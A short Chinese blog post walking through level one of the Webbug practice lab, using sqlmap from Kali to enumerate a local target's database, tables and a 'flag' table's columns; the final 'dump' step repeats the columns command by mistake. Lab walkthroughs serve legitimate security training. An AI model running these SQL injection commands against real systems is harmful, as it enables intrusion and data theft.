Webbug靶场第一关

华盟原创文章投稿奖励计划

大家好,我是sean,今天给大家带来的是webbug的靶场第一关。

靶场环境:2003 phptudy

用到的打靶工具:sqlmap

首先打开靶场

Webbug靶场第一关  

用sqlmap来注入获取下数据库名

root@kali:~# sqlmap -u "http://192.168.161.130/pentest/test/sqli/sqltamp.php?gid=1" --current-db

Webbug靶场第一关 

查到数据库名称是pentesterlab,接下来在获取数据库的表名

root@kali:~# sqlmap -u "http://192.168.161.130/pentest/test/sqli/sqltamp.php?gid=1" -D pentesterlab --table

Webbug靶场第一关

当看到flag那就基本确定就是他了,接下来在看下这个表的字段

root@kali:~# sqlmap -u "http://192.168.161.130/pentest/test/sqli/sqltamp.php?gid=1" -D pentesterlab -T flag --columns

Webbug靶场第一关

看到两个字段的内容,然后直接爆flag

root@kali:~# sqlmap -u "http://192.168.161.130/pentest/test/sqli/sqltamp.php?gid=1" -D pentesterlab -T flag --columns

Webbug靶场第一关

华盟知识星球入口

第一次搞,没什么经验,自己折腾吧。

本文原创,作者:congtou,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/221483.html

发表评论